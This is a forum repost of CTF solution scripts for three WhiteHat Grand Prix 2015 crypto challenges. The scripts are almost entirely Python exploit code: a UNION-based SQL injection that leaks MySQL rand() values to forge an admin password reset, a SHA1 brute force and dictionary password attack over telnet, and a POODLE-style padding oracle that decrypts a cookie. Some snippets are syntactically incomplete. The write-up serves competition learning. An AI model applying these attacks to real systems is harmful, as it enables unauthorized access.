[Writeup] Vòng loại WhiteHat Grand Prix 2015: Crypto100 - Crypto200 - Crypto250


7 bài viết
[Writeup] Vòng loại WhiteHat Grand Prix 2015: Crypto100 - Crypto200 - Crypto250
Nguồn: Everping (https://github.com/everping/ctfs/tre...ion-Round-2015)

Cảm ơn các bạn đã chia sẻ.

Crypto100 - HoiAn

http://lab14b.grandprix.whitehatvn.com/index.php.s (Mirror)

import md5
import requests
from decimal import Decimal

URL = "http://lab14b.grandprix.whitehatvn.com/index.php"

# https://github.com/twitter/mysql/blob/master/sql/password.c
# We can calculate the next random value from two previous values
def my_rnd(s1, s2):
    mv = 0x3FFFFFFFL
    s1 = (s1 * 3 + s2) % mv
    s2 = (s1 + s2 + 33) % mv
    rs = s1 / mv
    return rs

def next_rnd(rs1, rs2):
    mv = 0x3FFFFFFFL
    s1 = rs2 * mv
    s1p = rs1 * mv
    s2p = s1 - (s1p * 3) % mv
    s2 = (s1 + s2p + 33) % mv
    return my_rnd(s1, s2)

def md5_hash(msg):
    return md5.new(str(msg).strip()).hexdigest()

def find_between(s, first, last):
        start = s.index(first) + len(first)
        end = s.index(last, start)
        return s[start:end]
    except ValueError:
        return ""

# Get two random numbers using sql injection vulnerability
def get_bootstrap():
    payload = {'user': "' union select concat(rand(), '|', rand())-- -", 'sub1': 'Forgot+password+%3F+Reset'}
    r = requests.post(URL, data=payload)
    bootstrap = find_between(r.text, "id ", "...").strip().split("|")
    rand1 = Decimal(bootstrap[0])
    rand2 = Decimal(bootstrap[1])
    return rand1, rand2

def get_root():
    r1, r2 = get_bootstrap()

    # Calculate the next random value
    r3 = next_rnd(float(r1), float(r2))
    r3 = format(r3, '.16f')

    # hash and send request to server
    password = md5_hash(r3)
    payload = {'user': 'admin', 'sub2': 'sa', 'password': password}
    r = requests.post(URL, data=payload)
    return r.text

result = ""
while "flag" not in result:
    result = get_root()
print result

Crypto200 - BuonMaThuat
from hashlib import sha1
import telnetlib

def brute_hash(prefix, prefix_hash):
    print 'Breaking the hash... \n',
    for i in xrange(2 ** 35):
        s = str(prefix) + str(i)
        if sha1(str(s)).hexdigest()[:6] == prefix_hash:
            return s

def find_between(s, first, last):
        start = s.index(first) + len(first)
        end = s.index(last, start)
        return s[start:end]
    except ValueError:
        return ""

HOST = "lab12b.grandprix.whitehatvn.com"
PORT = 1337
tn = telnetlib.Telnet(HOST, PORT)

data = tn.read_until("> ")
print data
pre = find_between(data, 's has prefix ', ' and ')
suf = find_between(data, 'sha1(s) has prefix ', '.')

plain_hash = brute_hash(pre, suf)
print 'Send plain hash %s' % plain_hash

tn.write(plain_hash + '\n')
print tn.read_until('\n>')
print "Breaking admin's password"
password = ''

for line in reversed(open("/usr/share/dict/words").readlines()):
    password = line.strip()
    tn.write('r admi ' + 'n' + password + '\n')
    data = tn.read_until('.')
    if "just login" in data:
        print 'Found password = ' + password

tn.write('l admin ' + password + '\n')
tn.write('mm' + '\n')
print tn.read_until('==\n>')

Crypto250 - TamDao

http://lab11b.grandprix.whitehatvn.com:1337 (Mirror)

import copy
import requests


URL = "http://lab11b.grandprix.whitehatvn.com:1337/"

def get_msg(ck):
    cookie = dict(wanted=ck)
    r = requests.get(URL, cookies=cookie)
    return r.text

def chunks(l, n):
    if n < 1:
        n = 1
    return [l[i:i + n] for i in range(0, len(l), n)]

def get_cipher(prefix='', suffix=''):
    url = (URL + '?pre=%s&suf=%s' % (prefix, suffix))
    r = requests.get(url)
    return r.cookies['wanted'].decode('hex')

def get_secret_size():
    base_len = len(get_cipher())
    for s in range(1, BLOCK_SIZE + 1):
        prefix = chr(0x42) * s
        trial = len(get_cipher(prefix))
        if trial > base_len: break
    return base_len - BLOCK_SIZE - HMAC_SIZE - s

# This challenge is related to a known attack - Poodle Attack
# I did look into the code of l4w for reference http://l4w.io/2015/01/tetcon-ctf-2015-crypto200-the-poodle-attack/
# Thanks young guy :)
def get_secret():
    secret_size = get_secret_size()
    _secret = ""
    for m in range(1, 3):
        for n in range(BLOCK_SIZE - 1, -1, -1):
            if len(_secret) == secret_size:

            prefix = 'B' * (n % BLOCK_SIZE)
            suffix = 'C' * (secret_size - (n % BLOCK_SIZE))
            cookie = get_cipher(prefix, suffix)
            cipher_block = chunks(cookie, 16)

            for i in range(256):
                xor_byte = ord(cipher_block[m - 1][-1])
                new_block = copy.copy(cipher_block)
                new_block[len(cipher_block) - 1] = '\xff' * 15 + chr(i)
                response = get_msg(''.join(new_block).encode('hex'))
                if "wrong" not in response:
                    c = 31 ^ i ^ xor_byte
                    _secret += chr(c)
                    print 'Secret = ', _secret

    return _secret

def get_flag():
    wanted = get_secret()
    message = wanted[:8] + wanted[12:]
    r = requests.get(URL + "test?msg=" + message)
    return get_msg(r.text)

print get_flag()
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